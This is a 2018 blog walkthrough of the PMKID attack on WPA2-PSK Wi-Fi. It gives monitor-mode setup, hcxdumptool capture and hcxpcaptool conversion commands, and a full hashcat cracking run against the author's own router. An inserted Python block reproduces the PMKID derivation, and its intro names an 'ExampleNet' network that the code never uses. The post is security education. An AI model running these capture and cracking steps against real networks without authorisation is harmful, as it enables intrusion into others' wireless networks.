Adam Toscher
4 min read · Aug 6, 2018

New attack on WPA/WPA2 using PMKID

In this short blog post, I will walk you through the process of obtaining a valid PMKID frame and converting the captured data to hashcat format for cracking. This is a new way to recover WPA2-PSK passphrases from vulnerable devices that requires neither interaction between a client station and the access point nor a captured 4-way handshake.

Checklist:

Linux — Debian

# uname -ar
Linux ubuntu 4.13.0-46-generic #51-Ubuntu SMP Tue Jun 12 12:36:29 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Supported adapters (strict)

USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter
USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter
USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter

Out of all the cards mentioned, in my preliminary testing I found the older AWUS036H card I bought in 2012 to work the best.

AWUS036H

Both Alfa USB devices work well. Preliminary results show better performance with the AWUS036H. I was able to obtain multiple PMKID frames from a vulnerable access point, sometimes within seconds. The older Alfa AWUS036H is also a more powerful card and works better in noisier conditions.

root@ubuntu:~# lsusb
--- snip ---
Bus 003 Device 016: ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter

--- snip ---

Vulnerable Linksys E4200 router with WPA2-PSK authentication enabled

Seven-year-old home router from 2011
Wireless Settings

Walk-through:

# ip link set wlx00c0ca59f4b2 down
# iw dev wlx00c0ca59f4b2 set type monitor
# rfkill unblock all
# ip link set wlx00c0ca59f4b2 up
# ./hcxdumptool -i wlx00c0ca694df2 --enable_status -c 6 -o E4200-WPA2PSK.pcapng
--
[15:18:14 - 006] c0c1c04bfc68 -> e4209b5662d3 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 3605]
[15:18:16 - 006] c0c1c04bfc68 -> fcc2330136c6 [FOUND PMKID]
--
# ./hcxpcaptool -z E4200-WPA2PSK.16800 E4200-WPA2PSK.pcapng
start reading from E4200-WPA2PSK.pcapng

summary:
--------
file name....................: E4200-WPA2PSK.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.13.0-46-generic
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 129
skipped packets..............: 0
packets with FCS.............: 67
beacons (with ESSID inside)..: 2
probe requests...............: 2
probe responses..............: 4
association requests.........: 13
association responses........: 26
authentications (OPEN SYSTEM): 70
authentications (BROADCOM)...: 14
EAPOL packets................: 12
EAPOL PMKIDs.................: 1
best handshakes..............: 1 (ap-less: 0)
1 PMKID(s) written to E4200-WPA2PSK.16800
# cat E4200-WPA2PSK.16800
b0b606458a7945cf7c80b7fefe390506*c0c1c04bfc68*fcc2330136c6*436973636f3136383934

Details to be noted:

Ensure that the channel you pass to "-c" matches the channel of the access point you are targeting.

4. Hashcat

We can download the newly updated hashcat v4.2.0 from https://hashcat.net/hashcat/, which cracks two new hash types:

  • WPA-PMKID-PBKDF2
  • WPA-PMKID-PMK

The files have been copied to a Windows host and "cracked" below for illustration purposes only. Since the hash is a single hex-encoded string, it is much easier to copy and manage between different hosts.
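As an added example that is not part of the original post or of the hcxtools/hashcat projects, the Python below parses a 16800 line, decodes its ESSID and reproduces the PMKID derivation that hashcat evaluates for every candidate (PBKDF2 into a PMK, then HMAC-SHA1-128 over the two MAC addresses). The ExampleNet network, its MAC addresses and its passphrase are constructed; the takeaway for a defender is that only the 4096 PBKDF2 rounds stand between a captured PMKID and the passphrase, so passphrase entropy decides the outcome.

```python
import hashlib
import hmac
from dataclasses import dataclass

# The hcxpcaptool output line from this post: PMKID*MAC_AP*MAC_STA*ESSID(hex)
PAGE_LINE = "b0b606458a7945cf7c80b7fefe390506*c0c1c04bfc68*fcc2330136c6*436973636f3136383934"

@dataclass
class Pmkid16800:
    pmkid: bytes    # first 128 bits of the HMAC-SHA1 tag (16 bytes)
    mac_ap: bytes   # authenticator address AA (6 bytes)
    mac_sta: bytes  # supplicant address SPA (6 bytes)
    essid: bytes    # network name, hex-decoded (it is also the PBKDF2 salt)

def parse_16800(line: str) -> Pmkid16800:
    """Split and validate one hashcat -m 16800 line."""
    fields = line.strip().split("*")
    if len(fields) != 4:
        raise ValueError("expected PMKID*MAC_AP*MAC_STA*ESSID")
    pmkid, mac_ap, mac_sta, essid = (bytes.fromhex(f) for f in fields)
    if len(pmkid) != 16 or len(mac_ap) != 6 or len(mac_sta) != 6:
        raise ValueError("bad field length")
    return Pmkid16800(pmkid, mac_ap, mac_sta, essid)

def derive_pmk(passphrase: str, essid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    These 4096 rounds are the whole per-guess cost of the dictionary attack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)

def derive_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """IEEE 802.11: PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA)."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]

def passphrase_matches(entry: Pmkid16800, candidate: str) -> bool:
    """The check hashcat runs per candidate: does it reproduce the captured PMKID?"""
    tag = derive_pmkid(derive_pmk(candidate, entry.essid), entry.mac_ap, entry.mac_sta)
    return hmac.compare_digest(tag, entry.pmkid)

def build_16800_line(essid: str, mac_ap: str, mac_sta: str, passphrase: str) -> str:
    """Build a 16800 line for a network whose passphrase is known (self-audit/testing)."""
    ap, sta = bytes.fromhex(mac_ap), bytes.fromhex(mac_sta)
    pmkid = derive_pmkid(derive_pmk(passphrase, essid.encode()), ap, sta)
    return "*".join([pmkid.hex(), mac_ap, mac_sta, essid.encode().hex()])

if __name__ == "__main__":
    entry = parse_16800(PAGE_LINE)
    print("ESSID:", entry.essid.decode())  # Cisco16894
    print("consistent with hashcat's result:", passphrase_matches(entry, "testpassw0rd"))
```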

c:\Users\Adam\Downloads\hashcat-4.2.0>hashcat64.exe -m 16800 E4200-WPA2PSK.16800 wordlist.txt
hashcat (v4.2.0) starting...
======================================
* Device #1: GeForce GTX 1080, 2048/8192 MB allocatable, 20MCU
OpenCL Platform #2: Intel(R) Corporation
========================================
* Device #2: Intel(R) Core(TM) i7-6800K CPU @ 3.40GHz, skipped.
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Watchdog: Temperature abort trigger set to 90c
Dictionary cache built:
* Filename..: wordlist.txt
* Passwords.: 3
* Bytes.....: 29
* Keyspace..: 3
* Runtime...: 0 secs
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
b0b606458a7945cf7c80b7fefe390506*c0c1c04bfc68*fcc2330136c6*436973636f3136383934:testpassw0rd
Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: b0b606458a7945cf7c80b7fefe390506*c0c1c04bfc68*fcc23...383934
Time.Started.....: Mon Aug 06 18:32:57 2018 (0 secs)
Time.Estimated...: Mon Aug 06 18:32:57 2018 (0 secs)
Guess.Base.......: File (wordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 44 H/s (0.10ms) @ Accel:32 Loops:16 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 3/3 (100.00%)
Rejected.........: 1/3 (33.33%)
Restore.Point....: 0/3 (0.00%)
Candidates.#1....: passw0rd -> testpassw0rd
HWMon.Dev.#1.....: Temp: 44c Fan: 28% Util: 31% Core:1771MHz Mem:4513MHz Bus:16
Started: Mon Aug 06 18:32:54 2018
Stopped: Mon Aug 06 18:32:58 2018
c:\Users\Adam\Downloads\hashcat-4.2.0>type hashcat.potfile
b0b606458a7945cf7c80b7fefe390506*c0c1c04bfc68*fcc2330136c6*436973636f3136383934:testpassw0rd
Written by Adam Toscher

Adam is an offensive security engineer and red team operator with over 20 years of experience in IT.